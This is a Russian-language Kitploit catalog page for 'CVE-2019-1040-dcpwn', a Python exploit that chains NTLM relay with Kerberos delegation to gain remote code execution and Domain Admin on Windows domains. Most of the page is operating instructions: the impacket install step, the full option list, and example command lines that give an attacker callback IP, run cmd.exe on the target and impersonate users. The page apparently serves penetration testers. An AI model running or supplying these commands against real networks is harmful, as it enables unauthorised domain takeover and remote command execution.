Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ridter/cve-2019-1040-dcpwn
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеКомандование и УправлениеАутентификацияИнструмент Удаленного Доступа
GitHubridter/cve-2019-1040-dcpwn

CVE-2019-1040-dcpwn

CVE-2019-1040 с делегированием Kerberos

Репозиторий
33646 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-1040-dcpwn

Отличное описание! Эксплуатация CVE-2019-1040 - Объединение релейных уязвимостей для RCE и Domain Admin .

Итак, я написал dcpwn.py для удобства использования.

Требования

Эти инструменты требуют impacket. Вы можете установить его через pip

root@kitploit:~
pip install impacket

Использование

root@kitploit:~
использование: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
                [--smb-port [destination port]] --callback-ip CALLBACK_IP
                --ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
                [--impersonate IMPERSONATE] -t Target [-share SHARE]
                [--command [COMMAND [COMMAND ...]]] [--debug]

CVE-2019-1040 с делегированием Kerberos

необязательные аргументы:
  -h, --help            показать это сообщение справки и выйти
  -u USERNAME, --user USERNAME
                        имя пользователя для аутентификации
  -p PASSWORD, --password PASSWORD
                        Пароль для аутентификации, будет запрошен, если не
                        указан и не предоставлены хеши NT:NTLM
  --hashes HASHES       хеши LM:NLTM
  -d DOMAIN, --domain DOMAIN
                        домен, в котором находится пользователь (FQDN или NETBIOS имя домена)
  --smb-port [порт назначения]
                        Порт назначения для подключения к SMB серверу
  --callback-ip CALLBACK_IP
                        Имя хоста или IP атакующего
  --ldaps LDAPS         Имя хоста или ldaps сервер
  --dc-ip DC_IP         IP-адрес контроллера домена
  --timeout TIMEOUT     тайм-аут в секундах
  --impersonate IMPERSONATE
                        целевое имя пользователя, которое будет имитировано (через
                        S4U2Self) для запроса ST. Имейте в виду, что это будет
                        работать только если личность, указанная в этом скрипте,
                        разрешена для делегирования указанному SPN
  -t Target, --target Target
                        Имя хоста/IP целевого сервера
  -share SHARE          общая папка, из которой будет взят вывод (по умолчанию
                        ADMIN$)
  --command [COMMAND [COMMAND ...]]
                        команда для выполнения на цели. Если пусто, будет
                        запущена полуинтерактивная оболочка
  --debug               Включить отладочный вывод

пример:

root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target

Если вы хотите выполнить какую-либо команду, например cmd.exe, используйте --command

пример:

root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'

Если вы хотите имитировать указанного пользователя, используйте --impersonate

root@kitploit:~
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone
Скачать инструмент